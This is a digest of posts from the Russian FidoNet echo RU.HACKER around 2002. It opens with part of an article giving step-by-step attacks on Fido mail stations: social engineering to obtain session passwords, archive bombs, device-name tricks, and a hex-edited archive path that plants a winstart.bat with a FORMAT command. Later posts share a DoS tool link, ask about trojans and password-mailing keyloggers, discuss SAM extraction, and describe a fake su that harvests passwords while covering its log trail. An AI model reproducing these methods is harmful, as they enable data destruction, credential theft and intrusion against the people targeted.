отлавливать такие подарки. И, разумеется, свопиг надо сливать YK> на другой диск. Вторая заповедь. Пара слов о паролях Методы, о которых YK> я расскажу ниже, требуют знания пароля на сессию. о с печальной YK> улыбкой переворачивать страницу не стоит. Пароль на линк - YK> не инетовский логин; чтобы получить его, inetcrk.exe не нужен :). YK> Пароли на сессию охраняются минимально, если сисоп не страдает маниями YK> преследования и величия. Вот тебе сходу пяток способов заполучить пас YK> на связь с жертвой. Можно попросить у линка атакуемого узла или прямо YK> у жертвы логи или tic-файлы, скажем, якобы для отладки написанного YK> тобой анализатора. BadTic'и с паролями слабо ассоциируются - это же YK> пси-хо-ло-о-гия! Можно выклянчить конфиги, например, fastecho.cfg - YK> под предлогом, что ты сам, бедненький, никак не можешь настроить YK> систему. Можно попросить подшивку технической, в которой эхо-процессор YK> системы, над которой нависла беда, публикует отчеты. Часто такая эха YK> доступна всем поинтам (например, у меня, дурачка YK> доверчивого). екоторые особенно грамотные ноды вообще не настраивают YK> разделения на защищенные и незащищенные сессии (разрешают обработку YK> Unsecured Inbound), тогда вообще никакой пароль не нужен. Вполне YK> реально позвонить новоноде, подставив адрес существующего линка, тогда YK> T-mail гневно заявит: "Ошибка: несовпадение паролей", но покорно YK> отдаст всю почту и файло, из которых уже можно выяснить пароль - он YK> содержится в заголовке pkt-файлов и поле Pw tic-файлов. у и, наконец, YK> можно просто попросить у атакуемого узла поинта. Строгий, говоришь? YK> еужто не даст? е поверю! оды - как девицы определенного YK> (м)орального склада - при правильном подходе завсегда дадут. Если он YK> не набирает поинтов (а на самом деле это означает, что ты не умеешь YK> разговаривать с сисопами), расскажи, что ты хаб крутой хацкерской YK> сетки, и выдай ему фиктивную ноду. В общем, парольный линк с нужной YK> станцией наладить можно всегда. Иначе для чего человек в сети YK> лез? Сисопы: А вы фишку секите. Статья и для вас. Агрессоры: Да вы не YK> слушайте, это я так, сам с собой... О чем бишь я? А, конечно, методы, YK> требующие полноценной сессии. Поехали. Метод 4 - Бомба для YK> Эхо-процессора Атака Используется тот же принцип, что и в предыдущем YK> случае, только атака идет не на мылер, а на эхо-процессор. Старая как YK> мир и добрая как полевой командир дядя Хаттаб мыльная бомба. Создается YK> тысяч шестьдесят однобайтовых файлов (файлы с нулевой длиной эхопроцем YK> убиваются) с расширением .pkt, они пакуются в архив с каким-нибудь YK> красивым привычным для фидошного взгляда именем вроде 83b87341.th1 и YK> отсылаются на вражескую станцию. Там эхо-процессор (скажем, FatsEcho) YK> их распаковывает, но вместо того чтобы прибить, бережно сохраняет с YK> расширением .bad в темповой директории (для FastEcho это YK> System/Pathnames/Temp.Inbound). Разумеется, на прочие операции места YK> на винте не остается. Метод элегантен тем, что забивает именно тот YK> логический диск, который используется для временного хранения файлов. YK> Т.е. совет по переносу свопинга на другой диск, которые я давал выше, YK> в этом случае бессилен. Сгенерить эти тысячи файлов можно батником, YK> можно, при известном терпении, ручками, мне проще было написать YK> крохотную прогу. Гонись я за объемом - привел бы ее листинг YK> с паа-а-адробнейшими комментариями. Возможна вариация способа: слать YK> не тысячи крохотныйх фалов, а один немереный, хорошо утрамбованный YK> (100 метров одного символа ужимаются в 50 кило). Если сжимать не YK> слишком плотно, а, скажем, процентов на 80, атака выйдет менее YK> стремительной, зато это позволит обойти защиту, о которой я сейчас YK> поведаю беднягам-сисопам. Защита Спастись от этой напасти не так уж и YK> сложно. Большинство эхо-процессоров обладают механизмом защиты от YK> подобных почтовых бомб, который, к сожалению, почти никто не YK> настраивает. Он реализован в виде вычисления коэффициента компрессии YK> архивов (для FastEcho это System/ARCmail options/Max. YK> compression ratio) и определении его безопасного значения. апример, 10 YK> килобайтный архив, в котором умещается мег, ужат как 1024:10, т.е. в YK> соотношении 100 к 1, от всего объема остался 1%. ормальная почта так YK> свернуться не может, это явно бомба. Безопасный коэффициент, конечно, YK> варьируется в зависимости от типа данных и используемого архиватора, YK> но обычно лежит в пределах 2:1 - 7:1. Если сильно беспокоит YK> возможность забивания винта не таким уж и большим количеством файлов, YK> можно слезть с FAT16 и установить что-нибудь более прогрессивное, YK> например, FAT32 или NTFS. Метод 5 - Элементарно! Атака Самый простой YK> способ адской почтовой машинкой утихомирить станцию. YK> еожиданный, простой и остроумный. Срок действия: "...Видели ночь, YK> висели всю ночь, до утра". Абсолютно гуманный - никаких разрушительных YK> последствий, которые придется ликвидировать полжизни. Системному YK> оператору узла нужно только нажать ентер, и все заработает дальше. YK> Проникся? Может, уже догадался сам? ужно послать законный, честный YK> почтовый архив с правильным расширением (типа .mo1, .su0, .we7 и пр.), YK> но запароленный. Слать посылку нужно поздно, часа в три. Эхо-процессор YK> при распаковке спрашивает пароль у сисопа, который в этом время уже YK> видит жаркие юношеские сны, и эхопроцу приходится терпеливо ждать того YK> момента, когда хозяин продерет глаза, включит монитор и смачно YK> выматерится. Защита Ха, разбежались. Просто для всех архиваторов YK> прописываем строку распаковки таким образом, чтобы они по умолчанию на YK> все вопросы отвечали "Yes" и все запароленные архивы пытались открыть YK> с каким-нибудь паролем, т.е. выставляем архиверы на полностью YK> автоматический режим. емного повозиться, и хорошее настроение по утрам YK> нам обеспечено. Метод 6 - Перенаправление Атака Весьма хитроумный YK> способ, построен на перенаправлении вывода данных. Делается следующее. YK> Архивируем какой-нибудь файлик с именем из трех букв, YK> например... хм... ничего в голову не приходит. Во, придумал: "hi!". YK> Потом каким-нибудь hex-редактором (я люблю hiew) лезем в архив, и YK> исправляем в нем это имя (оно может встречаться несколько раз) на YK> магическое словечко "con". Все, при распаковке весь вывод будет YK> перенаправлен на консоль, т.е. файл будет не записываться, а YK> прокручиваться на экране, к тому же весьма неспешно. Можно направить YK> вывод на принтер (prn, lpt1) - почему бы тому не попечатать в YK> ночи? Или на ком-порты (com1, com2, com3, com4), что особенно весело, YK> поскольку на одном их них висит момед. Файл "clock$" при распаковке YK> архива просто подвесит задачу. В общем, возможности способа весьма YK> неслабые. а этом принципе построен знаменитый комплект бомбочек YK> Fire&Forget. Метод работает на большинстве архиваторов, но не на всех. YK> Так, последние версии малоизвестного архивера ZIP считают такие имена YK> неправильными. Зато простодушный HA распаковывает все что ни попадя, YK> для экспериментов с хитрыми названиями файлов он идеально YK> подходит. Защита Что тут можно посоветовать? Разрешить эхо-процессору YK> работать только теми архиваторами, которые блокируют использование YK> запрещенных имен файлов. И не забывать ставить свежие версии по мере YK> их появления. А то мне придется рассказывать про ANSI-бомбы в YK> заставках древнего зипа, дыру для которых PKWARE зализала года четыре YK> назад. Метод 7 - Генерим архивы Атака Генерация архивов, содержащих YK> апокрифические имена файлов, предоставляет юному исследователю широкое YK> поле для экспериментов. Помимо игры с портами ввода/вывода, можно YK> придумать немало других веселых и познавательных затей. апример, YK> создать архив, содержащий два одинаковых имени файла. Если YK> сисоп невнимательно читал про метод 5, то при выволакивании на свет YK> Божий второго файла архиватор задастся сложным вопросом: "Overwrite? YK> (Yes/No)", и ответа ждать ему придется до самого утра. Однако сисопа YK> можно и разбудить, забив названия файлов в архиве символами YK> 07h, инициирующими стандартный писк спикера (винды превращают его в YK> свой гнусный звучок). Как приятно всей семьей проснуться в четыре ночи YK> под пронзительное верещание компа. Сей способ применяется и при YK> создании т.н. $pice бомб. Под этим зловещим и непонятным термином в YK> прямом смысле скрываются файлы с именами из одних пробелов. В виндах с YK> ними можно работать как с обычными, но вот заметить непросто. Эти YK> невидимки выращиваются до чудовищных размеров, отсылаются в крохотном YK> архиве и складируются на винте жертвы, т.е., в общем-то, представляют YK> собой вариацию метода 3, но выглядящую гораздо прикольнее. Вернее, YK> никак не выглядящую. Достоверно известно, что питерский кул-зизоп Вася YK> П. покосился умом, когда директория с входящим файлом после получаса YK> работы станции вдруг принялась весить полгига. Способ рассчитан на YK> полных якорей, конечно, но YK> работает. Имя файла можно забить пробелами вручную, но гораздо круче YK> склепать прогой с хацкерским названием $pice Bomb$ YK> Generator. Защита От всех неприятностей, описанных здесь, несложно YK> защититься, если уметь читать. И делать это не с середины, а с начала YK> статьи. Отсылаю к фундаментальному труду проф. А..Басова "АТАКА YK> ФИДОШОЙ СТАЦИИ". Метод 8 - Подделываем пути Атака аверное, самый YK> убийственный метод из всех здесь описанных. Основывается опять-таки на YK> подделке имени файла в архиве, только на этот раз мы играем не YK> с вводом/выводом и не с необычными знаками, а с путями. Идея YK> заключается в том, что мы направляем распаковку файла не в текущую YK> директорию, а в корневую. В общем-то, я все сказал. Ты продолжаешь YK> читать? Ты должен был свалиться в глубоком обмороке! Или подскочить к YK> столу и с протяжным воем вышвырнуть модем в окно. Или с горящими YK> глазами долбить по клавиатуре, рассылая смерть и разрушения друзьям и YK> недругам. Ты ничего этого не сделал? Тогда придется объяснить YK> подробнее. Умея направлять из архива файл в корень диска, мы получаем YK> возможность перелопатить там на свой лад все что захотим: переписать YK> autoexec.bat, поменять здоровенький command.com на инфицированный YK> какой-нибудь дрянью, забить корень мусором, обнулить все важные файлы, YK> в общем, мы можем полностью порушить систему. Как это сделать? Я - YK> человек честный. Спросят - отвечу. Все очень просто. Многие YK> архиваторы, если перед именем файла стоит слэш, распаковывают файл в YK> корневую директорию. ам остается лишь этот слэш поставить. Покажу на YK> примере. Создаем в оболочке, допускающей использование длинных YK> имен (Far, WinCommander, ПолуПроводник, наконец) файл twinstart.bat. В YK> него записываем такие строчки (не ошибись ни на символ, иначе ничего YK> не получится): ECHO Remote Disk Formater v0.7b by DaRk PupkinoID ECHO YK> Привет всем днепропетровским девчонкам FORMAT A: /AUTOTEST Разумеется, YK> мы хотим отформатировать врагу дискетку, которую он постоянно забывает YK> в дисководе. Пакуем батничек каким-нибудь виндовым YK> архиватором, сохраняющим лонгнэймы и позволяющим копаться в своих YK> архивах, например, WinRar'ом. Затем лезем в архив hex-редактором, и YK> исправляем в имени файла "t" на "/". Файл пропал из архива - чтобы YK> враг не заметил. о на самом деле он там есть, более того, его имя YK> перестало быть длинным, и при распаковке он будет корректно извлечен YK> досовской версией Rar'а. И не просто извлечен, а в корень текущего YK> диска. А имя-то какое красивое - winstart.bat! Файлик с YK> таким благозвучным названием запускается автоматом при старте виндов. YK> Так что дискетке жить до первой перезагрузки. Остается продумать YK> способ доставки. Вместе с почтовым пакетом это сделать не удастся, YK> поскольку файлы, не имеющие расширения .pkt, эхо-процессором YK> не обрабатываются, и архиву с таким файлом присваивается расширение YK> .bad. Конечно, можно отослать этот файлик противнику вместе с YK> какой-нибудь программкой и сабжем "Лови, ты, вроде, просил", но YK> использование человеческого фактора при атаке станции я в этой статье YK> игнорирую - иначе придется писать о вирях, рушащих целые сети, троянах YK> и похитителях паролей. Из-за этого моего каприза нам придется YK> использовать автоматику и отправлять смертоносный невидимый winstart в YK> архиве, запущенном по фэхе - файловой эхо-конференции. Можно YK> создать свою, специально для этого теракта (если у противника YK> разрешено создавать с тебя фэхи), можно воспользоваться уже YK> существующей, ничего сложного, здесь важнее отследить правильность YK> поля Destination, чтобы архив действительно не разошелся по всей фэхе YK> и не форматнул дискетки на всех станциях сети. Когда архив приходит на YK> станцию, та запускает файлэхо-процессор, который начинает YK> переупаковывать архив, в этот-то момент наш невидимый файлик YK> и выскальзывает в корень диска. Итак, при следующем рестарте компа YK> неудачливого сисопа мы отформатируем его дискетку. еплохо, да? Однако YK> это произойдет при определенных условиях, о которых не следует YK> забывать, а именно: сисоп сидит под виндами, станция стоит на диске YK> C:, фэхопроц переупаковывает пришедшие файлы, сисоп прочитал эту YK> статью и настроил архиваторы таким образом, чтобы overwrite просиходил YK> автоматом, без вмешательства оператора. В 90% случаев дела YK> обстоят именно так. Способ интересный, мощный и надежный. Можно пойти YK> дальше и заняться созданием или перезаписью прочих файлов на YK> диске жертвы. Возможности серьезнейшие - от кражи коллекции джипегов YK> (приаттачить их батничком) до поздравления с днем рождения, когда YK> какой-нибудь dn.com на компе именинника заменяется свежесклепанной YK> программкой. Я уверен, ты будешь заниматься исключительно такого плана YK> вещами. у что, разыгралось воображение? Беги, твори, а я еще немного YK> здесь побуду, расскажу, как спастись от твоих поздравлений. Защита е YK> думаю, что эта инфа вызовет волну удаленного форматирования хардов, YK> поскольку провернуть эту операцию не так уж и просто, как может YK> показаться. о принять базовые меры безопасности против подобного YK> метода атаки, безусловно, надо. Прежде всего, не следует держать YK> станцию на C: это системный диск, для операционки и сопутствующих YK> утилит, почтовая станция на нем неуместна и, как выяснилось пару YK> абзацев назад, опасна. Кроме того, в корне C: необходимо создать YK> файлик winstart.bat и поставить на него атрибут Read-Only, равно как и YK> на autoexec.bat, и прочие файлы, которые не требуют частого изменения. YK> Архиваторы файлы с таким атрибутом не перезаписывают, даже если YK> overwrite в их настройках по умолчанию выставлен на "Yes". Кстати, их YK> можно научить и говорить "No", не девочки чай. YK> Можно поэкспериментировать с архиваторами и заставить станцию работать YK> только теми, которые не позволяют копаться в созданных ими архивах (в YK> этом смысле не подводит старичок ARJ). Можно даже защитить хард от YK> форматирования, если совсем уж страшно, или прятать все диски во время YK> работы станции. В общем, шанс выжить у нас есть. Особенно, если YK> ответственно подойти к обеспечению безопасности своего почтового узла YK> и четко представлять схемы, по которым он может быть атакован. е YK> умеешь бить - никогда не научишься правильно ставить блок, YK> верно? Метод 9 - Древнейший Атака Все это в высшей степени здорово. YK> Все это может сработать. о напоследок, на прощание, я открою тебе YK> древний стопроцентно надежный способ. икакой программной защиты от YK> него не существует. С первых недель создания ФИДО величайшие умы YK> планеты изобретают виртуозные, сложнейшие, многоходовые YK> схемы нарушения работы почтовой станции. о и по сей день наиболее YK> эффективным инструментом для выведения ее из строя является... что бы YK> ты думал? Обыкновенная бейсбольная бита. Аплодисменты. Кланяюсь. YK> Занавес. YK> По материалам xakep.ru YK> -+- GoldED 1.1.5-20010807 YK> + Origin: Я люблю твои губы алые, как большие, так и малые. YK> (2:461/214.23@"!") Пока. --- GoldED 2.50+ * Origin: (2:5066/26.57) = Здесь обитают хакеры ====================================================New= Msg : 4467 [1-10330] K/s From : Svg7 02-Nov-02 23:15:07 2:5020/996.777 To : Nick Spiridonov 2:5057/55 Subj : Re: Atack! =====================================================================RU.HACKER= ||*()*|| Hi there, Nick! 01 Nov 02 01:56, you wrote to me: NS> 2AOT Кто-нить Black ICE юзал? я юзал. Прикольная весчь, но до полноценного фаервола недотягивает... Хотя последние версии я не видел Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4468 [1-10330] From : Igor Martynow 03-Nov-02 04:55:27 2:5061/7.18 To : Anton Zinatov 2:5010/300.8 Subj : дypацкая защита :( =====================================================================RU.HACKER= Hi Anton! Tue Jan 0-1169 1906 , 0-10:0-4, Anton Zinatov ==> Valery Efanov: VE>> Чем переть sam? Что-нибудь типа compact linux(на флоппи) с ntfs VE>> поддержкой? AZ> Рекомендую universal boot disk. Поддеpживает нтфс. Гpузит тучу дpайвеpов. AZ> Только когда вытащишь sam не забудь его pасшифpовать пpежде чем натpавишь AZ> l0phtcrack. как и чем? Igor ║╓╖╓-║╓╢╓╖║╓╖╓╖╟╜ ·∙∙· ╜╜╜─╜╜╙╨╙═╙╙╜╙╜╙╙$ystem --- GoldED 2.50.A0204+ * Origin: Женщина - это существо альтеpнативного пола (FidoNet 2:5061/7.18) = Здесь обитают хакеры ====================================================New= Msg : 4469 [1-10330] K/s From : Andrey Kavun AKA dr0n 03-Nov-02 20:28:08 2:5096/21.10 To : Alexey Evstigneev 2:5011/251.313 Subj : нюк для win 98 =====================================================================RU.HACKER= ┌───────────── ─ ─ ─ ─ * │Да здравствует многоуважаемый, *Alexey!* ╔╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦╩╦ AK>> smbdie. вешает Win2k & WinXP AE> SmbDie - просто рулез! роняет w2k c sp3 и nt4 c sp6. AE> мне очень понравилась прога. Мож кините ссылочку??? --- *▓│ Бывайте, господа ихтиандры!!!│▓* * Origin: Серп и молот - КОСИ и ЗАБИВАЙ!!! (2:5096/21.10) = Здесь обитают хакеры ====================================================New= Msg : 4470 [1-10330] From : Anton Golovanov 03-Nov-02 13:40:00 2:5053/777.8 To : All Subj : Троян =====================================================================RU.HACKER= =================== Приветствую Вас _*All!*_ ==================== Подскажите,plz! Как пользоваться вот этим трояном ZIMENOK 6,ZIMENOK 9? И вообще достойны они своего использования? До встречи! Приятно было с Вами пообщаться./*Anton!*/ --- Fregate 1.52/D32 * Origin: Hе всё так просто,как кажется... (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 4471 [1-10330] From : Nickolas Romanov 03-Nov-02 18:07:58 2:5002/63.66 To : Alexey Evstigneev 2:5011/251.313 Subj : Re^2: нюк для win 98 =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Alexey!*_/ /·─·.·■·─/ Однажды, _01 ноя 02 00:42_, *Alexey Evstigneev* /*2:5011/251.313*/ писАл(а) к *Andrey Kovalev*, и я решил вмешаться: AK>> smbdie. вешает Win2k & WinXP AE> SmbDie - просто рулез! роняет w2k c sp3 и nt4 c sp6. AE> мне очень понравилась прога. Тока я что-то не понял, там же обязательно надо NETBIOS name вводить?.. А если его не знаешь? /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ ... Играет песня /Солнышко/ в исполнении /Demo/ --- GoldED+ snapshot-2002.10.27 (WinNT 5.0.2195-Service_Pack_2 i586) * Origin: Кошмар Фрейда - фаллос Мебиуса. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4472 [1-10330] From : Leonid Zaprudsky 02-Nov-02 19:51:54 2:5020/2552.23 To : Nikita Melnikov 2:5030/956.128 Subj : QNX =====================================================================RU.HACKER= Nikita! В Суб Hоя 02 2002-го в 18:43, Nikita Melnikov писал к Youriy Kaliman: YK>> Тут pечь зашла о QNX... А можHо ли в этой системе устаHовить gcc, g++ YK>> и дp ? асколько оHа совместима с UNIX/Linux ? У меHя стояла QNX 6.0, YK>> Hо это голая ОС без пользовательских пpогpам и утилит... NM> Можно там все поставить. Т.к. qnx является архитектурно юниксом, да и невеpно. В коpне: qnx поддеpживает posix, поэтомy и виден всем как юникс. [GANG] ICQ=100-830-181 Leprud@MaiL.Ru np: silence (Winamp is not active ;-) --- GoldED+/W32 1.1.5-20011017 * Origin: (2:5020/2552.23) = Здесь обитают хакеры ====================================================New= Msg : 4473 [1-10330] From : Kropov Valentine 03-Nov-02 20:19:43 2:465/274.30 To : MALKINA TATYANA 2:5085/131.202 Subj : RE: ASSEMBLER =====================================================================RU.HACKER= 03 ноябpя 02 HеКтО MALKINA TATYANA ПиСаЛ(а)[о] к ALL следующее: MT> Можно конкpетных ситуаций и пpимеpов использования ассемблеpа, только MT> pеальных плиз. Hа Ассемблеpе можно делать то, что многие ЯВУ не могут делать + гибкость абсолютная. Hо, зная его, хакеpом от этого не станешь : Kropov Valentine aka vallkor [PTDS] : http://vallkor.chat.ru [Cracking] [Asm] [C++] [Halaving] [Music] --- FIPS/2001 * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4474 [1-10330] K/s From : Svg7 03-Nov-02 12:37:42 2:5020/996.777 To : Nickolay Kudar' 2:5071/55.369 Subj : Re: Ищу =====================================================================RU.HACKER= ||*()*|| Hi there, Nickolay! 02 Nov 02 11:38, you wrote to All: NK> Существуют ли в пpиpоде пpогpаммка, котоpая бы запоминала набpанные NK> слова на клавиатуpе, но только те, котоpые вводятся звездочками? NK> И еще, есть ли пpогpаммка/тpоян, после установки котоpой на NK> компьютеp, она пpи любых изменениях в pwl-файле она пpи соединении NK> этого компа с инетом высылала бы файл на опpеделенный электpонный NK> ящик? я таких не знаю, но на дельфях пишутся при должном опыте очень быстро. Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4475 [1-10330] From : Nikita Melnikov 05-Nov-02 00:08:12 2:5030/956.128 To : Leonid Zaprudsky 2:5020/2552.23 Subj : QNX =====================================================================RU.HACKER= Приветствую тебя, Leonid! 02 ноя 02 19:51, you wrote to me: YK>>> Тут pечь зашла о QNX... А можHо ли в этой системе устаHовить YK>>> gcc, g++ и дp ? асколько оHа совместима с UNIX/Linux ? У меHя YK>>> стояла QNX 6.0, Hо это голая ОС без пользовательских пpогpам и YK>>> утилит... NM>> Можно там все поставить. Т.к. qnx является архитектурно юниксом, NM>> да и LZ> невеpно. В коpне: qnx поддеpживает posix, поэтомy и виден всем как LZ> юникс. Это и подрозумевалось. Просто если б я сказал про posix, то вылезли бы виндузятники, орущие, что маздай соответствует posix, со всеми вытекающими Да не упадет ядро твое в корку, Leonid! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4476 [1-10330] From : Dmitry Frolov 07-Nov-02 13:20:35 2:6028/4.15 To : Youra Kaliman 2:461/214.23 Subj : ASSEMBLER =====================================================================RU.HACKER= Здравствуй, Youra Kaliman Прошу прощения что вмешиваюсь, но: YK> Пpислать тебе исходHики WCIH с полHыми коммеHтаpиями ? Кpоме этого у меHя ^^^^ сие есть оооочень интересно.... YK> дофига pазличHых пpог Hа ASM-е (когда-то попал ко мHе CD с тpаHслятоpами ^^^^^^^^^^^^^^^^это тоже круто.... YK> и там YK> было дофига пpимеpов). Есть довольHо моHстpовитые пpоги... [skiped] а мне мона cih посмотреть и другую муть... если мона кинь мылом... ну все, пока! Dmitry Frolov aka Stalker A$H --- Terminate 4.00 * Origin: The NEW Terminate will -=> FAX <=- almost anything! (2:6028/4.15) = Здесь обитают хакеры ====================================================New= Msg : 4477 [1-10330] From : Nikita Melnikov 07-Nov-02 00:57:56 2:5030/956.128 To : Artem Korneev 2:5022/103.25 Subj : Что делать с линухом. =====================================================================RU.HACKER= Приветствую тебя, Artem! 05 ноя 02 23:05, you wrote to me: AK>>> файл с паролями. Потом проедешься по нему утилиткой для AK>>> расшифровки (какой - не скажу, не знаю, но, кажется, что-то AK>>> такое есть). NM>> Расшифровка?????? Сам-то понял что сказал???????? AK> М-м.. Сам пока не пробовал. А в чём дело? Да так, алгоритм там немного нерасшифрабельный. NM>> Или в Debian не так, как в Slackware? AK> В Debian'е при ошибке аутентификации рута пишется то, что я AK> написал. Понял AK>>> Sorry. AK>>> $ su AK>>> Password: AK>>> # NM>> А его не насторожит отсутствие записи в логах? AK> Hу если админ такой дотошный, то запись можно потом вручную AK> ввести. Hо я не думаю, что он это заметит. Ты сам часто в логах AK> копаешься? И как, внимательно? Hет, не часто. Hо у меня пишет, когда последний логин был и сколько раз кто-то неправильно ввел пароль. Хватает, в основном AK> Искренне Ваш, Artem Korneev. Да не упадет ядро твое в корку, Artem! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4478 [1-10330] K/s From : Pavel Martinov 17-Sep-01 20:13:51 2:5080/135.30 To : All Subj : NT4.0 ServicePack 5.0 =====================================================================RU.HACKER= Hi, All. У меня в универе стоит сабж. Подскажите какие-нибудь подскажет знаменитые баги? Или какой-нибудь исходник експлойта? ;) Или ещё ченить интересного. Благодарю. Bye... Pavel Martinov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: --==Matrix hs you...--== (2:5080/135.30) = Здесь обитают хакеры ====================================================New= Msg : 4479 [1-10330] From : Krolle Leonid 06-Nov-02 08:38:12 2:5020/3232 To : Alexey Evstigneev 2:5011/251.313 Subj : нюк для win 98 =====================================================================RU.HACKER= Hello _Alexey_! 03 ноября 2002 19:39, Alexey Evstigneev wrote to Andrey Kavun AKA dr0n: AE>>> SmbDie - просто рулез! роняет w2k c sp3 и nt4 c sp6. AE>>> мне очень понравилась прога. An>> Мож кините ссылочку??? AE> http://www.xakep.ru/post/16132/smbdie.zip w2k sp3+обновления - Not vunable Krolle ... [Team Drunk][Team AutoStop][Team Bob Marley][Team Reggae][Team Музыканты!] --- GoldED+/W32 1.1.5-020726 * Origin: [Team Участник R50.SYSOP.DRUNK - 2002] [Team]! (2:5020/3232) = Здесь обитают хакеры ====================================================New= Msg : 4480 [1-10330] Pvt K/s From : Igel 07-Nov-02 00:41:32 2:5080/169.17 To : Oleg Kapitonov 2:5051/31.28 Subj : цвет dosовой стpоки поменять =====================================================================RU.HACKER= Hallo, Oleg Kapitonov Emsi Chatter with Oleg [Ctrl-Y to Exit] 31 октября 2002 15:01 EmsiHandshake Oleg Kapitonov ──> All on subject цвет dosовой стpоки поменять [Some text was corrupted] OK> Где-то читал, как сабж. Hо давно - забыл... 8( Подскажите, пжалста. В 2K и выше есть команда color. В 6.22, 7.00 и т.п. есть ansi.sys Прописываешь его device'ом в config.sys и извращаешься ;) Я, например, такой батник намалевал: /Вот тут начался Windows Clipboard/ @echo off if "%1"=="" goto normal if "%2"=="" goto font if "%3"=="" goto backfont echo [%3;4%2;3%1m > col.txt goto end :backfont echo [4%2;3%1m > col.txt goto end :font echo [3%1m > col.txt goto end :normal echo  > col.txt goto end :end type col.txt del col.txt > nul /А тут Windows Clipboard кончился/ Hафига я сделал вывод в файл, а потом его печать я уже не помню. Работает уже три года без двух дней Ж;) [■]-=[MKT]=-[■] Name: Pasha Krutchinin ... Team [_SMES_] --- Сила впрыска не влияет на качество отпрыска. * Origin: Igel, simply Igel... (2:5080/169.17) = Здесь обитают хакеры ====================================================New= Msg : 4481 [1-10330] From : Ivan Zagorodko 07-Nov-02 16:07:36 2:5020/2019.307 To : All Subj : Свитч =====================================================================RU.HACKER= *Здорово*, _*All*_! $ Я тут потыкал в клаву и ... $ Мне тут интересно стало, пропускает ли свитч левые пакеты (созданные мною), если не правильно сформулировал, sorry Отличии хаба и свитча в этом вопросе ... Что делать если свитч на пути пакетов, как обходить и все в том же духе ... ЗЫЖ Доки присланные в мыло приветствуются, или литература по конструированию пакетов и так далее .. ... Team: [NitroNet] [Hовогиреево] [ULTRA - 100.5fm] [ПИВО] --- Россия - страна халявы! - Moscow Rulez Forever * Origin: Hе водкой единой пьян человек! (2:5020/2019.307) = Здесь обитают хакеры ====================================================New= Msg : 4482 [1-10330] From : Nikita Melnikov 08-Nov-02 00:15:16 2:5030/956.128 To : Dmitry Radishev 2:5015/42 Subj : Что делать с линухом. =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 06 ноя 02 13:53, you wrote to me: NM>> А его не насторожит отсутствие записи в логах? DR> А ты каждый раз после сбоя авторизации идешь копать логи? Кстати, с DR> _этим_-то справиться просто: пусть программка сама позовет su с DR> неверным паролем - и в логах всё в порядке будет, и сообщение об DR> ошибке какое надо выдастся. Поправка принимается :) DR> All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая DR> базовая] Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4483 [1-10330] K/s From : Youra Kaliman 08-Nov-02 01:14:08 2:461/214.23 To : Dmitry Frolov 2:6028/4.15 Subj : ASSEMBLER =====================================================================RU.HACKER= Здpавствуй Dmitry ! 07 Nov 02 13:20, you wrote to me: DF> Прошу прощения что вмешиваюсь, но: YK>> Пpислать тебе исходHики WCIH с полHыми коммеHтаpиями ? Кpоме этого у YK>> меHя DF> ^^^^ сие есть оооочень интересно.... YK>> дофига pазличHых пpог Hа ASM-е (когда-то попал ко мHе CD с YK>> тpаHслятоpами DF> ^^^^^^^^^^^^^^^^это тоже круто.... YK>> и там YK>> было дофига пpимеpов). Есть довольHо моHстpовитые пpоги... DF> [skiped] DF> а мне мона cih посмотреть и другую муть... если мона кинь мылом... Кину конечно, что мне жалко :-), только заююкаю, ты, насколько я догадываюсь, тоже, небось, не хаpьковский... Только в ближайшее вpемя... (сегодня уже позно с моей АТС воевать :-) DF> ну все, пока! Всего хоpошего! DF> Dmitry Frolov aka Stalker A$H Youra --- GoldED 1.1.5-20010807 * Origin: Долой предрассудки! Женщина - она тоже человек! (2:461/214.23@"YK") = Здесь обитают хакеры ====================================================New= Msg : 4484 [1-10330] From : Kostya Vorobyov 08-Nov-02 11:36:18 2:5004/6.250 To : all Subj : не для ламеpов =====================================================================RU.HACKER= Hello, all! есть известный IP, pяд откpытых сканиpованием поpтов, телнет. вопpос: как имея вышепеpечисленное по инету залесть на домашнюю машину(нужны ее диски), пpиэтом т.к. машина домашняя, то специально диски никто pасшаpивать для вас не стал:) может кpоме телнета еще что пpедложат. P.S. тpоянов не пpедлагать --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: Wanna save planet? Kill yourself! (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4485 [1-10330] K/s From : Evgene Kochergin 03-Nov-02 01:39:28 2:5080/84.72 To : Vadim Kusakin 2:464/450 Subj : English Platinum 2000 =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Vadim! 09 октября 2002 16:52, Vadim Kusakin wrote to All: VK> Есть сабж после копирования на другую пару компактов не хочет VK> инсталится. После запуска сетапки вылетает месэйджбокс "Курс не VK> установлен, запустите сетап ещё раз". Hасколько я понимаю у компакта VK> защита от копирования. Внимание вопрос как обойти эту бяку? в ep2000.ini посмотри пути · Выражение: ушел в подпрограмму... Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: 